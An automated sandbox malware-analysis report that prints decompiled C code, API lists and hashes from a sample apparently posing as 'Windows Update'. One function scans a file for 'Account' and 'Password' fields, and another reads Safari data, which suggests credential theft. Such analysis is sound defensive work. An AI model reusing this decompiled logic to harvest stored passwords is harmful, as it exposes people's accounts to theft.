                                                                                                                    0x0001c197
                                                                                                                    0x0001c197
                                                                                                                    0x0001c19f
                                                                                                                    0x0001c1ab
                                                                                                                    0x0001c1be
                                                                                                                    0x0001c1c8
                                                                                                                    0x0001c1d2
                                                                                                                    0x0001c1dc
                                                                                                                    0x0001c1e6
                                                                                                                    0x0001c1ef
                                                                                                                    0x0001c1f6
                                                                                                                    0x0001c1fb
                                                                                                                    0x0001c201
                                                                                                                    0x0001c206
                                                                                                                    0x0001c647
                                                                                                                    0x0001c64a
                                                                                                                    0x0001c654
                                                                                                                    0x0001c20c
                                                                                                                    0x0001c20c
                                                                                                                    0x0001c20e
                                                                                                                    0x00000000
                                                                                                                    0x0001c214
                                                                                                                    0x0001c214
                                                                                                                    0x0001c215
                                                                                                                    0x0001c217
                                                                                                                    0x0001c218
                                                                                                                    0x0001c219
                                                                                                                    0x0001c21e
                                                                                                                    0x0001c224
                                                                                                                    0x0001c229
                                                                                                                    0x0001c22c
                                                                                                                    0x0001c232
                                                                                                                    0x0001c237
                                                                                                                    0x0001c23a
                                                                                                                    0x0001c240
                                                                                                                    0x0001c242
                                                                                                                    0x0001c261
                                                                                                                    0x0001c262
                                                                                                                    0x0001c268
                                                                                                                    0x0001c276
                                                                                                                    0x0001c27d
                                                                                                                    0x0001c282
                                                                                                                    0x0001c288
                                                                                                                    0x0001c28d
                                                                                                                    0x0001c293
                                                                                                                    0x0001c296
                                                                                                                    0x0001c298
                                                                                                                    0x0001c29a
                                                                                                                    0x0001c63c
                                                                                                                    0x0001c63d
                                                                                                                    0x0001c645
                                                                                                                    0x0001c646
                                                                                                                    0x00000000
                                                                                                                    0x0001c2a0
                                                                                                                    0x0001c2a0
                                                                                                                    0x0001c2a7
                                                                                                                    0x0001c2b0
                                                                                                                    0x0001c2b5
                                                                                                                    0x0001c2b8
                                                                                                                    0x0001c2ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001c2c0
                                                                                                                    0x0001c2c3
                                                                                                                    0x0001c2c3
                                                                                                                    0x0001c2c6
                                                                                                                    0x0001c2c8
                                                                                                                    0x0001c2ce
                                                                                                                    0x0001c2ce
                                                                                                                    0x0001c2d1
                                                                                                                    0x0001c2d3
                                                                                                                    0x0001c62d
                                                                                                                    0x0001c62d
                                                                                                                    0x0001c633
                                                                                                                    0x0001c635
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0001c2d9
                                                                                                                    0x0001c2e1
                                                                                                                    0x0001c2e3
                                                                                                                    0x00000000
                                                                                                                    0x0001c2e9
                                                                                                                    0x0001c2fc
                                                                                                                    0x0001c302
                                                                                                                    0x0001c31d
                                                                                                                    0x0001c323
                                                                                                                    0x0001c331
                                                                                                                    0x0001c336
                                                                                                                    0x0001c338
                                                                                                                    0x0001c627
                                                                                                                    0x0001c627
                                                                                                                    0x00000000
                                                                                                                    0x0001c33e
                                                                                                                    0x0001c349
                                                                                                                    0x0001c34b
                                                                                                                    0x00000000
                                                                                                                    0x0001c351
                                                                                                                    0x0001c351
                                                                                                                    0x0001c354
                                                                                                                    0x00000000
                                                                                                                    0x0001c35a
                                                                                                                    0x0001c35a
                                                                                                                    0x0001c35d
                                                                                                                    0x00000000
                                                                                                                    0x0001c363
                                                                                                                    0x0001c36a
                                                                                                                    0x0001c372
                                                                                                                    0x0001c378
                                                                                                                    0x0001c385
                                                                                                                    0x0001c38b
                                                                                                                    0x0001c395
                                                                                                                    0x0001c39e
                                                                                                                    0x0001c3a4
                                                                                                                    0x0001c3b3
                                                                                                                    0x0001c3b8
                                                                                                                    0x0001c3c4
                                                                                                                    0x0001c3cc
                                                                                                                    0x0001c3d1
                                                                                                                    0x0001c3de
                                                                                                                    0x0001c3e6
                                                                                                                    0x0001c3ee
                                                                                                                    0x0001c3f4
                                                                                                                    0x0001c3fe
                                                                                                                    0x0001c407
                                                                                                                    0x0001c40d
                                                                                                                    0x0001c41c
                                                                                                                    0x0001c42c
                                                                                                                    0x0001c43c
                                                                                                                    0x0001c44c
                                                                                                                    0x0001c454
                                                                                                                    0x0001c45a
                                                                                                                    0x0001c484
                                                                                                                    0x0001c48b
                                                                                                                    0x0001c490
                                                                                                                    0x0001c496
                                                                                                                    0x0001c499
                                                                                                                    0x0001c49b
                                                                                                                    0x0001c622
                                                                                                                    0x0001c625
                                                                                                                    0x0001c625
                                                                                                                    0x00000000
                                                                                                                    0x0001c4a1
                                                                                                                    0x0001c4a1
                                                                                                                    0x0001c4a3
                                                                                                                    0x00000000
                                                                                                                    0x0001c4a9
                                                                                                                    0x0001c4bb
                                                                                                                    0x0001c4bf
                                                                                                                    0x0001c4c4
                                                                                                                    0x0001c4ca
                                                                                                                    0x0001c4cd
                                                                                                                    0x0001c4d7
                                                                                                                    0x0001c4d7
                                                                                                                    0x0001c4da
                                                                                                                    0x0001c4dd
                                                                                                                    0x0001c4dd
                                                                                                                    0x0001c4eb
                                                                                                                    0x0001c4eb
                                                                                                                    0x0001c502
                                                                                                                    0x0001c508
                                                                                                                    0x0001c50e
                                                                                                                    0x0001c517
                                                                                                                    0x0001c517
                                                                                                                    0x0001c51a
                                                                                                                    0x0001c51d
                                                                                                                    0x0001c51d
                                                                                                                    0x0001c524
                                                                                                                    0x0001c526
                                                                                                                    0x0001c52b
                                                                                                                    0x0001c655
                                                                                                                    0x0001c65b
                                                                                                                    0x0001c65e
                                                                                                                    0x0001c660
                                                                                                                    0x0001c662
                                                                                                                    0x0001c666
                                                                                                                    0x0001c66c
                                                                                                                    0x0001c66d
                                                                                                                    0x0001c66e
                                                                                                                    0x0001c66f
                                                                                                                    0x0001c670
                                                                                                                    0x0001c671
                                                                                                                    0x0001c672
                                                                                                                    0x0001c673
                                                                                                                    0x0001c674
                                                                                                                    0x0001c675
                                                                                                                    0x0001c676
                                                                                                                    0x0001c677
                                                                                                                    0x0001c678
                                                                                                                    0x0001c67f
                                                                                                                    0x0001c68b
                                                                                                                    0x0001c691
                                                                                                                    0x0001c692
                                                                                                                    0x0001c695
                                                                                                                    0x0001c6a2
                                                                                                                    0x0001c6ac
                                                                                                                    0x0001c6b6
                                                                                                                    0x0001c6c0
                                                                                                                    0x0001c6ca
                                                                                                                    0x0001c6d4
                                                                                                                    0x0001c6db
                                                                                                                    0x0001c6e2
                                                                                                                    0x0001c6e9
                                                                                                                    0x0001c6f0
                                                                                                                    0x0001c6f7
                                                                                                                    0x0001c6fe
                                                                                                                    0x0001c705
                                                                                                                    0x0001c70c
                                                                                                                    0x0001c713
                                                                                                                    0x0001c71a
                                                                                                                    0x0001c721
                                                                                                                    0x0001c728
                                                                                                                    0x0001c72f
                                                                                                                    0x0001c736
                                                                                                                    0x0001c73d
                                                                                                                    0x0001c744
                                                                                                                    0x0001c74b
                                                                                                                    0x0001c752
                                                                                                                    0x0001c759
                                                                                                                    0x0001c760
                                                                                                                    0x0001c767
                                                                                                                    0x0001c76e
                                                                                                                    0x0001c775
                                                                                                                    0x0001c77c
                                                                                                                    0x0001c783
                                                                                                                    0x0001c78a
                                                                                                                    0x0001c791
                                                                                                                    0x0001c798
                                                                                                                    0x0001c79f
                                                                                                                    0x0001c7a6
                                                                                                                    0x0001c7ad
                                                                                                                    0x0001c7b5
                                                                                                                    0x0001c7b7
                                                                                                                    0x0001c80e
                                                                                                                    0x0001c810
                                                                                                                    0x0001c814
                                                                                                                    0x0001c81e
                                                                                                                    0x0001c7b9
                                                                                                                    0x0001c7b9
                                                                                                                    0x0001c7c5
                                                                                                                    0x0001c7ee
                                                                                                                    0x0001c7f4
                                                                                                                    0x0001c7fe
                                                                                                                    0x0001c804
                                                                                                                    0x0001c806
                                                                                                                    0x0001c826
                                                                                                                    0x0001c82f
                                                                                                                    0x0001c83a
                                                                                                                    0x0001c83e
                                                                                                                    0x0001c83f
                                                                                                                    0x0001c846
                                                                                                                    0x0001c84f
                                                                                                                    0x0001c808
                                                                                                                    0x0001c808
                                                                                                                    0x00000000
                                                                                                                    0x0001c808
                                                                                                                    0x0001c806
                                                                                                                    0x0001c531
                                                                                                                    0x0001c533
                                                                                                                    0x0001c546
                                                                                                                    0x0001c54b
                                                                                                                    0x0001c54e
                                                                                                                    0x0001c550
                                                                                                                    0x0001c582
                                                                                                                    0x0001c583
                                                                                                                    0x0001c586
                                                                                                                    0x0001c58c
                                                                                                                    0x0001c58c
                                                                                                                    0x0001c618
                                                                                                                    0x0001c552
                                                                                                                    0x0001c565
                                                                                                                    0x0001c56a
                                                                                                                    0x0001c56d
                                                                                                                    0x0001c56d
                                                                                                                    0x00000000
                                                                                                                    0x0001c550
                                                                                                                    0x0001c52b
                                                                                                                    0x0001c4a3
                                                                                                                    0x0001c49b
                                                                                                                    0x0001c35d
                                                                                                                    0x0001c354
                                                                                                                    0x0001c34b
                                                                                                                    0x0001c338
                                                                                                                    0x0001c2e3
                                                                                                                    0x00000000
                                                                                                                    0x0001c2d3
                                                                                                                    0x0001c63b
                                                                                                                    0x00000000
                                                                                                                    0x0001c63b
                                                                                                                    0x0001c244
                                                                                                                    0x0001c244
                                                                                                                    0x0001c24a
                                                                                                                    0x0001c252
                                                                                                                    0x0001c260
                                                                                                                    0x0001c260
                                                                                                                    0x0001c242
                                                                                                                    0x0001c20e
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 0001C1F6
                                                                                                                    • _fseek.LIBCMT ref: 0001C219
                                                                                                                    • _malloc.LIBCMT ref: 0001C232
                                                                                                                      • Part of subcall function 00077BCE: __FF_MSGBANNER.LIBCMT ref: 00077BE5
                                                                                                                      • Part of subcall function 00077BCE: __NMSG_WRITE.LIBCMT ref: 00077BEC
                                                                                                                    • __fread_nolock.LIBCMT ref: 0001C27D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock__wfopen_s_fseek_malloc
                                                                                                                    • String ID: H}>$I$appl$com.$e.Sa$fari
                                                                                                                    • API String ID: 375348327-3462864509
                                                                                                                    • Opcode ID: 1a873c5dce213d705d04b015f7dcf2c0fe33bfaeac4afa8ac49061306c789284
                                                                                                                    • Instruction ID: 5664ad3b001b0eda6163058f98b44612cc92ae099a792260a1beed7aa7b21e76
                                                                                                                    • Opcode Fuzzy Hash: 1a873c5dce213d705d04b015f7dcf2c0fe33bfaeac4afa8ac49061306c789284
                                                                                                                    • Instruction Fuzzy Hash: 6FF17EB5D042689BDB20DFA4CC85BEDBBB8EF08300F0441D9E54DAB242E7759A85CF95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0001F0B7 Relevance: 19.6, APIs: 13, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 47%
                                                                                                                    			E0001F0B7() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				void* _t35;
				signed int _t36;
				intOrPtr* _t38;
				signed int _t39;

				_v8 =  *0x481f80 ^ _t39;
				_t31 =  *0x470104;
				_t7 =  *_t31(0xfffffff5);
				_t8 =  *0x47004c(_t7,  &_v32);
				_t36 = _v24 & 0x0000ffff;
				_t44 = _t8;
				if(_t8 == 0) {
					_t36 = 0xf;
				}
				_t9 =  *_t31(0xfffffff5);
				_t38 =  *0x470050;
				 *_t38(_t9, 0xf);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				_t14 =  *_t31(0xfffffff5, 0x4703d0, 0x470398, 0x470378, 0x470360, 0x47035c, 0x470318);
				 *_t38(_t14, 0xf);
				E00079C53(_t31, _t36, _t38, _t44);
				_t17 =  *_t31(0xfffffff5, 0x470318);
				 *_t38(_t17, 0xa);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				E00079C53(_t31, _t36, _t38, _t44);
				_t28 =  *_t31(0xfffffff5, 0x47051c, 0x47050c, 0x4703dc, 0x4704f0, 0x4704d0, 0x4703dc, 0x470480, 0x470470, 0x4703dc, 0x470434, 0x470424, 0x4703f0, 0x4703dc);
				return E000772F2( *_t38(_t36 | 0x00000008), _t31, _v8 ^ _t39, _t35, _t36 | 0x00000008, _t38, _t28);
			}





















                                                                                                                    0x0001f0c4
                                                                                                                    0x0001f0c8
                                                                                                                    0x0001f0d2
                                                                                                                    0x0001f0d9
                                                                                                                    0x0001f0df
                                                                                                                    0x0001f0e3
                                                                                                                    0x0001f0e5
                                                                                                                    0x0001f0e7
                                                                                                                    0x0001f0e7
                                                                                                                    0x0001f0ee
                                                                                                                    0x0001f0f0
                                                                                                                    0x0001f0f9
                                                                                                                    0x0001f100
                                                                                                                    0x0001f114
                                                                                                                    0x0001f123
                                                                                                                    0x0001f12d
                                                                                                                    0x0001f132
                                                                                                                    0x0001f139
                                                                                                                    0x0001f143
                                                                                                                    0x0001f148
                                                                                                                    0x0001f154
                                                                                                                    0x0001f15e
                                                                                                                    0x0001f168
                                                                                                                    0x0001f177
                                                                                                                    0x0001f181
                                                                                                                    0x0001f190
                                                                                                                    0x0001f19a
                                                                                                                    0x0001f1a9
                                                                                                                    0x0001f1b3
                                                                                                                    0x0001f1bd
                                                                                                                    0x0001f1d6

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: 5c9291e5854e53c87d8811a1cd8e349ed07527149dd1dd5fd2e6ad2ec99ad9bd
                                                                                                                    • Instruction ID: 25754c3e3cae1d3581d278e2396662d21ebbfebb77827093075bfeeed02745c7
                                                                                                                    • Opcode Fuzzy Hash: 5c9291e5854e53c87d8811a1cd8e349ed07527149dd1dd5fd2e6ad2ec99ad9bd
                                                                                                                    • Instruction Fuzzy Hash: A2216F51F82715F6891177B4AD47FDE3A989B41B28F32C227BA1CB20C3D8AC6510457E
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 000A178C Relevance: 19.6, APIs: 13, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 47%
                                                                                                                    			E000A178C() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				void* _t35;
				signed int _t36;
				intOrPtr* _t38;
				signed int _t39;

				_v8 =  *0x482960 ^ _t39;
				_t31 =  *0x474044;
				_t7 =  *_t31(0xfffffff5);
				_t8 =  *0x474074(_t7,  &_v32);
				_t36 = _v24 & 0x0000ffff;
				_t44 = _t8;
				if(_t8 == 0) {
					_t36 = 0xf;
				}
				_t9 =  *_t31(0xfffffff5);
				_t38 =  *0x474078;
				 *_t38(_t9, 0xf);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				_t14 =  *_t31(0xfffffff5, 0x474500, 0x4744cc, 0x4744ac, 0x474498, 0x474494, 0x474450);
				 *_t38(_t14, 0xf);
				L000FDF32(_t36, _t38, _t44);
				_t17 =  *_t31(0xfffffff5, 0x474450);
				 *_t38(_t17, 0xa);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				L000FDF32(_t36, _t38, _t44);
				_t28 =  *_t31(0xfffffff5, 0x47462c, 0x47461c, 0x47450c, 0x474600, 0x4745e0, 0x47450c, 0x4745a0, 0x474594, 0x47450c, 0x474564, 0x474554, 0x474520, 0x47450c);
				return L000FBE87( *_t38(_t36 | 0x00000008), _t31, _v8 ^ _t39, _t35, _t36 | 0x00000008, _t38, _t28);
			}





















                                                                                                                    0x000a1799
                                                                                                                    0x000a179d
                                                                                                                    0x000a17a7
                                                                                                                    0x000a17ae
                                                                                                                    0x000a17b4
                                                                                                                    0x000a17b8
                                                                                                                    0x000a17ba
                                                                                                                    0x000a17bc
                                                                                                                    0x000a17bc
                                                                                                                    0x000a17c3
                                                                                                                    0x000a17c5
                                                                                                                    0x000a17ce
                                                                                                                    0x000a17d5
                                                                                                                    0x000a17e9
                                                                                                                    0x000a17f8
                                                                                                                    0x000a1802
                                                                                                                    0x000a1807
                                                                                                                    0x000a180e
                                                                                                                    0x000a1818
                                                                                                                    0x000a181d
                                                                                                                    0x000a1829
                                                                                                                    0x000a1833
                                                                                                                    0x000a183d
                                                                                                                    0x000a184c
                                                                                                                    0x000a1856
                                                                                                                    0x000a1865
                                                                                                                    0x000a186f
                                                                                                                    0x000a187e
                                                                                                                    0x000a1888
                                                                                                                    0x000a1892
                                                                                                                    0x000a18ab

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: 469e66d7722e6f1dd74bd9db88829ed3f7379e17e22bf4b43a058ce5e81e51a3
                                                                                                                    • Instruction ID: bb955a550d94c664a88cdc4b8ddb785dd34adb01e7f3686cb5bdba1497ac20cf
                                                                                                                    • Opcode Fuzzy Hash: 469e66d7722e6f1dd74bd9db88829ed3f7379e17e22bf4b43a058ce5e81e51a3
                                                                                                                    • Instruction Fuzzy Hash: C5219291BD430876C910BBF45C07FFE7A594BA1F20B71C627B72DA28D3DB984808657A
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0009ED1C Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 436COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 43%
                                                                                                                    			E0009ED1C(intOrPtr _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char* _v88;
				intOrPtr* _v92;
				char _v100;
				signed char _v101;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				char _v120;
				intOrPtr _v124;
				char _v160;
				char _v208;
				char* _v212;
				intOrPtr* _v216;
				char _v288;
				char _v416;
				char _v544;
				char _v1044;
				char _v1556;
				char _v2068;
				long _v2580;
				char _v3092;
				char _v4116;
				char _v4628;
				signed int _v4632;
				signed int _v4636;
				signed int _v4640;
				signed int _v4644;
				signed int _v4648;
				signed int _v4652;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t150;
				signed int _t164;
				signed int _t165;
				signed int _t170;
				signed int _t173;
				signed int _t198;
				signed int _t218;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				signed int _t241;
				intOrPtr _t243;
				void* _t267;
				void* _t270;
				signed int _t274;
				char* _t275;
				intOrPtr _t276;
				void* _t277;
				signed int _t281;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				intOrPtr* _t287;
				intOrPtr* _t289;
				signed int _t291;
				signed int _t292;
				intOrPtr* _t293;
				signed int _t296;
				intOrPtr* _t298;
				intOrPtr* _t300;
				signed char _t301;
				void* _t304;
				signed int _t309;
				void* _t318;
				void* _t319;
				void* _t321;
				signed int _t322;
				void* _t323;
				signed int _t324;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				signed int _t334;
				void* _t335;
				signed int _t336;
				intOrPtr* _t337;
				intOrPtr* _t338;
				void* _t339;
				signed int _t342;
				void* _t343;
				intOrPtr* _t344;
				void* _t345;
				signed int _t346;
				signed int _t347;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t352;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				signed int _t357;
				void* _t358;
				void* _t359;
				void* _t360;
				void* _t361;

				L000FBE9C(0x1228);
				_v8 =  *0x482960 ^ _t346;
				_t274 =  *0x474060(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v4648 = _t274;
				if(_t274 != 0xffffffff) {
					_t322 =  *0x474054(_t274, 0, 2, 0, 0, 0, _t321);
					_v4644 = _t322;
					__eflags = _t322;
					if(_t322 != 0) {
						_t334 =  *0x47404c(_t322, 4, 0, 0, 0, _t333);
						_v4636 = _t334;
						__eflags = _t334;
						if(_t334 != 0) {
							_v4640 = 0;
							_t150 =  *0x474040(_t274,  &_v4640);
							__eflags = _v4640;
							_v4652 = _t150;
							if(_v4640 != 0) {
								L52:
								_pop(_t335);
								_pop(_t323);
								__eflags = _v8 ^ _t346;
								return L000FBE87(_t150, _t274, _v8 ^ _t346, _t318, _t323, _t335);
							} else {
								_t274 = _t334;
								_t324 = _t150;
								_v20 = 0x63634100;
								_v16 = 0x746e756f;
								_v12 = 0;
								_v32 = 0x73615000;
								_v28 = 0x726f7773;
								_v24 = 0x64;
								_t281 = _t150;
								_t349 = _t348 + 0x10;
								_v4632 = _t281;
								__eflags = _t281;
								if(_t281 == 0) {
									goto L52;
								} else {
									while(1) {
										_v4116 = 0;
										_t23 = _t324 - 0x14; // -20
										_t24 = _t281 + 0x14; // 0x14
										_v2068 = 0;
										_v2580 = 0;
										_v288 = 0;
										_v544 = 0;
										_v3092 = 0;
										_v4628 = 0;
										_v1556 = 0;
										_v416 = 0;
										_v160 = 0;
										_t336 = E000A335C(_t24, _t23,  &_v20, 9);
										E000FD273( &_v1556, 0x200, _v4632 + 0x10,  *(_v4632 + 0xc) & 0x000000ff);
										_t284 = E000A335C(_t274, _t324,  &_v32, 9);
										_t350 = _t349 + 0x30;
										__eflags = _t284;
										if(_t284 == 0) {
											goto L12;
										}
										__eflags = _t336;
										if(_t336 == 0) {
											L11:
											_t40 = _t284 + 0x11; // 0x11
											E000FD273( &_v544, 0x80, _t40,  *(_t284 + 0xd) & 0x000000ff);
											_push(1);
											_push( &_v160);
											_push( &_v544);
											L54();
											_t350 = _t350 + 0x1c;
										} else {
											__eflags = _t284 - _t336;
											if(_t284 < _t336) {
												goto L11;
											}
										}
										L12:
										_t285 = E000A335C(_t274, _t324, 0x4748fc, 0xc);
										_t351 = _t350 + 0x10;
										__eflags = _t285;
										if(_t285 != 0) {
											__eflags = _t336;
											if(_t336 == 0) {
												L15:
												_t45 = _t285 + 0x14; // 0x14
												E000FD273( &_v288, 0x80, _t45,  *(_t285 + 0x10) & 0x000000ff);
												_push(1);
												_push( &_v416);
												_push( &_v288);
												L54();
												_t351 = _t351 + 0x1c;
											} else {
												__eflags = _t285 - _t336;
												if(_t285 < _t336) {
													goto L15;
												}
											}
										}
										_t286 = E000A335C(_t274, _t324, 0x47490c, 0xa);
										_t349 = _t351 + 0x10;
										__eflags = _t286;
										if(_t286 == 0) {
											L21:
											_t287 =  &_v544;
											_t319 = _t287 + 1;
											do {
												_t164 =  *_t287;
												_t287 = _t287 + 1;
												__eflags = _t164;
											} while (_t164 != 0);
											__eflags = _t287 - _t319 - 1;
											if(_t287 - _t319 > 1) {
												_t296 = E000A335C(_t274, _t324, 0x47491c, 0xe);
												_t355 = _t349 + 0x10;
												__eflags = _t296;
												if(_t296 != 0) {
													__eflags = _t336;
													if(_t336 == 0) {
														L27:
														_t61 = _t296 + 0x16; // 0x16
														E000FD273( &_v4628, 0x200, _t61,  *(_t296 + 0x12) & 0x000000ff);
														_t355 = _t355 + 0x10;
													} else {
														__eflags = _t296 - _t336;
														if(_t296 < _t336) {
															goto L27;
														}
													}
												}
												E000FC711( &_v1044, 0x1f4, 0x474a84);
												_t198 =  *0x483d84;
												_t356 = _t355 + 0xc;
												__eflags = _t198;
												if(__eflags != 0) {
													_push( &_v1044);
													_push(0x474b44);
													_push(_t198);
													E000FDBDE(_t274, _t324, _t336, __eflags);
													_push( &_v1556);
													_push(0x474b58);
													_push( *0x483d84);
													E000FDBDE(_t274, _t324, _t336, __eflags);
													E000FDCF0( *0x483d84, 0x474b68,  &_v160);
													_push( *0x483d84);
													_push(0x474b78);
													E000FDD09(_t274, _t324, _t336, __eflags);
													_t349 = _t356 + 0x2c;
												} else {
													_push( &_v160);
													_push( &_v1556);
													_push( &_v1044);
													_push(0x474b2c);
													L000FDF32(_t324, _t336, __eflags);
													_t349 = _t356 + 0x10;
												}
											}
											_t289 =  &_v288;
											_t318 = _t289 + 1;
											do {
												_t165 =  *_t289;
												_t289 = _t289 + 1;
												__eflags = _t165;
											} while (_t165 != 0);
											__eflags = _t289 - _t318 - 1;
											if(_t289 - _t318 > 1) {
												_t291 = E000A335C(_t274, _t324, 0x47492c, 0xe);
												_t352 = _t349 + 0x10;
												__eflags = _t291;
												if(_t291 != 0) {
													__eflags = _t336;
													if(_t336 == 0) {
														L37:
														_t73 = _t291 + 0x16; // 0x16
														E000FD273( &_v3092, 0x200, _t73,  *(_t291 + 0x12) & 0x000000ff);
														_t352 = _t352 + 0x10;
													} else {
														__eflags = _t291 - _t336;
														if(_t291 < _t336) {
															goto L37;
														}
													}
												}
												_t292 = E000A335C(_t274, _t324, 0x47493c, 0xf);
												_t353 = _t352 + 0x10;
												__eflags = _t292;
												if(_t292 != 0) {
													__eflags = _t336;
													if(_t336 == 0) {
														L41:
														_t76 = _t292 + 0x17; // 0x17
														E000FD273( &_v2068, 0x200, _t76,  *(_t292 + 0x13) & 0x000000ff);
														_t353 = _t353 + 0x10;
													} else {
														__eflags = _t292 - _t336;
														if(_t292 < _t336) {
															goto L41;
														}
													}
												}
												_t293 =  &_v2068;
												_t318 = _t293 + 1;
												do {
													_t170 =  *_t293;
													_t293 = _t293 + 1;
													__eflags = _t170;
												} while (_t170 != 0);
												__eflags = _t293 - _t318 - 1;
												if(_t293 - _t318 < 1) {
													E000FC711( &_v2068, 0x200,  &_v2580);
													_t353 = _t353 + 0xc;
												}
												E000FC711( &_v1044, 0x1f4, 0x474a84);
												_t173 =  *0x483d84;
												_t354 = _t353 + 0xc;
												__eflags = _t173;
												if(__eflags != 0) {
													_push( &_v1044);
													_push(0x474b44);
													_push(_t173);
													E000FDBDE(_t274, _t324, _t336, __eflags);
													_push( &_v1556);
													_push(0x474b58);
													_push( *0x483d84);
													E000FDBDE(_t274, _t324, _t336, __eflags);
													E000FDCF0( *0x483d84, 0x474b68,  &_v416);
													_push( *0x483d84);
													_push(0x474b78);
													E000FDD09(_t274, _t324, _t336, __eflags);
													_t349 = _t354 + 0x2c;
												} else {
													_push( &_v416);
													_push( &_v1556);
													_push( &_v1044);
													_push(0x474b2c);
													L000FDF32(_t324, _t336, __eflags);
													_t349 = _t354 + 0x10;
												}
											}
											__eflags = _t336;
											if(_t336 == 0) {
												 *0x474050(_v4636);
												_t337 =  *0x474124;
												 *_t337(_v4644);
												_t150 =  *_t337(_v4648);
												goto L52;
											} else {
												_t324 = _v4652 - _t336 + _v4636;
												_t281 = _t336;
												_t274 = _t336;
												_v4632 = _t281;
												continue;
											}
										} else {
											__eflags = _t336;
											if(_t336 == 0) {
												L19:
												_v4632 = ( *(_t286 + 0xe) & 0x000000ff) + ( *(_t286 + 0xe) & 0x000000ff);
												_t51 = _t286 + 0x12; // 0x12
												E000FD453( &_v4116, 0x200, _t51, ( *(_t286 + 0xe) & 0x000000ff) + ( *(_t286 + 0xe) & 0x000000ff));
												_t218 = _v4632;
												_t357 = _t349 + 0x10;
												__eflags = _t218 - 0x400;
												if(_t218 >= 0x400) {
													L000FCFD2();
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t346);
													_t347 = _t357;
													_t358 = _t357 - 0x74;
													_v104 =  *0x482960 ^ _t347;
													asm("movq xmm0, [0x474884]");
													_push(_t274);
													_t275 = _v88;
													_push(_t336);
													_t338 = _v92;
													_v108 =  *0x47488c & 0x000000ff;
